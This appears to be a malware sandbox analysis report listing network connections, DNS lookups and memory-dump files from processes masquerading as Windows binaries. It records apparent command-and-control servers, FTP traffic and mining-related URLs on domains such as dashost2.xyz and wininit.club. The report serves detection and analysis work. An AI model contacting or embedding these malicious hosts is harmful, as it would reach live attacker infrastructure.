                                                                                                                                                                                                                                                                          • 109.248.203.91:61759
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            37.7kB
                                                                                                                                                                                                                                                                            1.2MB
                                                                                                                                                                                                                                                                            820
                                                                                                                                                                                                                                                                            819
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            788 B
                                                                                                                                                                                                                                                                            778 B
                                                                                                                                                                                                                                                                            16
                                                                                                                                                                                                                                                                            12
                                                                                                                                                                                                                                                                          • 178.237.33.50:80
                                                                                                                                                                                                                                                                            http://www.geoplugin.net/json.gp?ip=154.61.71.51
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            366 B
                                                                                                                                                                                                                                                                            1.3kB
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                            4

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://www.geoplugin.net/json.gp?ip=154.61.71.51

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 192.0.32.59:43
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            244 B
                                                                                                                                                                                                                                                                            492 B
                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                          • 109.248.203.91:60088
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            190 B
                                                                                                                                                                                                                                                                            18.1kB
                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                            13
                                                                                                                                                                                                                                                                          • 196.192.115.21:43
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            336 B
                                                                                                                                                                                                                                                                            2.6kB
                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            778 B
                                                                                                                                                                                                                                                                            692 B
                                                                                                                                                                                                                                                                            16
                                                                                                                                                                                                                                                                            10
                                                                                                                                                                                                                                                                          • 109.248.203.91:52502
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            282 B
                                                                                                                                                                                                                                                                            24.1kB
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                            17
                                                                                                                                                                                                                                                                          • 193.109.79.176:3333
                                                                                                                                                                                                                                                                            loders.xyz
                                                                                                                                                                                                                                                                            MicrosoftHost.exe
                                                                                                                                                                                                                                                                            647 B
                                                                                                                                                                                                                                                                            580 B
                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                          • 194.147.78.109:80
                                                                                                                                                                                                                                                                            http://dashost2.xyz/LTC.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            audiodg.exe
                                                                                                                                                                                                                                                                            463 B
                                                                                                                                                                                                                                                                            664 B
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                            4

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost2.xyz/randomx/STATUS.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost2.xyz/LTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.11.138:80
                                                                                                                                                                                                                                                                            http://wininit.club/d/web.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            audiodg.exe
                                                                                                                                                                                                                                                                            277 B
                                                                                                                                                                                                                                                                            372 B
                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                            3

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/d/web.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            rms-server.tektonit.ru
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            68 B
                                                                                                                                                                                                                                                                            84 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            rms-server.tektonit.ru

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            185.175.44.167

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            56 B
                                                                                                                                                                                                                                                                            72 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            ip-api.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            208.95.112.1

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            freemail.freehost.com.ua
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            70 B
                                                                                                                                                                                                                                                                            86 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            freemail.freehost.com.ua

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            194.0.200.251

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            wininit.club

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            109.248.11.138

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            wininit.club

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            109.248.11.138

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            dashost.club

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            185.212.148.107

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            stcubegames.netxi.in
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            66 B
                                                                                                                                                                                                                                                                            82 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            stcubegames.netxi.in

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            185.143.145.9

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            71 B
                                                                                                                                                                                                                                                                            170 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            raw.githubusercontent.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            151.101.0.133
                                                                                                                                                                                                                                                                            151.101.64.133
                                                                                                                                                                                                                                                                            151.101.128.133
                                                                                                                                                                                                                                                                            151.101.192.133

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            iplogger.org
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            iplogger.org

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            88.99.66.31

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            71 B
                                                                                                                                                                                                                                                                            170 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            raw.githubusercontent.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            151.101.0.133
                                                                                                                                                                                                                                                                            151.101.64.133
                                                                                                                                                                                                                                                                            151.101.128.133
                                                                                                                                                                                                                                                                            151.101.192.133

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            api.ip.sb
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            55 B
                                                                                                                                                                                                                                                                            145 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            api.ip.sb

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            104.26.12.31
                                                                                                                                                                                                                                                                            172.67.75.172
                                                                                                                                                                                                                                                                            104.26.13.31

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            checkip.amazonaws.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            67 B
                                                                                                                                                                                                                                                                            271 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            checkip.amazonaws.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            52.206.184.85
                                                                                                                                                                                                                                                                            34.200.69.241
                                                                                                                                                                                                                                                                            107.21.162.206
                                                                                                                                                                                                                                                                            18.209.89.50
                                                                                                                                                                                                                                                                            52.20.197.7
                                                                                                                                                                                                                                                                            52.204.109.97
                                                                                                                                                                                                                                                                            23.21.27.29
                                                                                                                                                                                                                                                                            3.222.126.94

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            iplogger.org
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            iplogger.org

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            88.99.66.31

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            60 B
                                                                                                                                                                                                                                                                            110 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            whois.iana.org

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            192.0.32.59

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            63 B
                                                                                                                                                                                                                                                                            138 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            196.192.115.21
                                                                                                                                                                                                                                                                            196.216.2.20
                                                                                                                                                                                                                                                                            196.216.2.21

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            63 B
                                                                                                                                                                                                                                                                            93 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            www.geoplugin.net

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            178.237.33.50

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            60 B
                                                                                                                                                                                                                                                                            110 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            whois.iana.org

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            192.0.32.59

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            63 B
                                                                                                                                                                                                                                                                            138 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            196.192.115.21
                                                                                                                                                                                                                                                                            196.216.2.20
                                                                                                                                                                                                                                                                            196.216.2.21

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            loders.xyz
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            56 B
                                                                                                                                                                                                                                                                            72 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            loders.xyz

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            193.109.79.176

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            dashost2.xyz
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            dashost2.xyz

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            194.147.78.109

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            wininit.club

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            109.248.11.138

                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • memory/3312-31-0x0000000003720000-0x0000000003721000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3312-32-0x0000000002F20000-0x0000000002F21000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3312-30-0x0000000002F20000-0x0000000002F21000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3312-33-0x0000000003720000-0x0000000003721000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4640-520-0x00007FF618460000-0x00007FF618A00000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                                                                          • memory/4988-488-0x00000000059F0000-0x00000000059F1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-483-0x0000000005210000-0x0000000005211000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-489-0x0000000005F90000-0x0000000005F91000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-490-0x0000000006660000-0x0000000006661000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-491-0x0000000006D60000-0x0000000006D61000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-486-0x0000000004B80000-0x0000000004B81000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-478-0x0000000000330000-0x0000000000331000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-485-0x0000000004C00000-0x0000000004C01000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-487-0x0000000004E60000-0x0000000004E61000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-475-0x0000000071C30000-0x000000007231E000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            6.9MB

                                                                                                                                                                                                                                                                          • memory/4988-501-0x00000000068A0000-0x00000000068A1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-484-0x0000000004B60000-0x0000000004B61000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-507-0x00000000080D0000-0x00000000080D1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-504-0x0000000007390000-0x0000000007391000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          We care about your privacy.

                                                                                                                                                                                                                                                                          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.